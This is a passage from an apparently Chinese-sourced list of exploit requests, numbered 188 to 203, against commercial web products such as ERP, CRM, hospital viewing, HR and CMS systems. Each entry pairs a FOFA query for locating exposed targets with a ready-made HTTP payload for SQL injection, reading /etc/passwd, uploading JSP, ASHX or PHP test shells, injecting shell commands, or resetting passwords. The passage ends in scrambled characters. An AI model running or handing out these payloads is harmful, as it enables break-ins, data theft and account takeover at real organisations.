object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short-video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. Esafenet (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. Futong Tianxia (富通天下) Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. Hillstone Networks (山石网科) Yunjian (云鉴) Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. FE (飞企互联) Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. Feiyuxing (飞鱼星) Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan Fengsu Technology (河南省风速科技) Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. Zheda Ente (浙大恩特) Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. Aliyun Drive (阿里云盘) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload
1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. Founder (方正) Omni-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. Weiqing (微擎) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.3
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. Redsea Cloud (红海云) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
4 J z6 _7 |/ v, U
2 D; D+ w7 d+ f. X! U. y7 L$ I' H4 @5 E
+ G9 X7 b; m: ~( O% i
* [: a, ?! {, P5 |5 f
5 X- E- \7 t% m: Z) n8 S
% I8 H/ @. m8 v& w |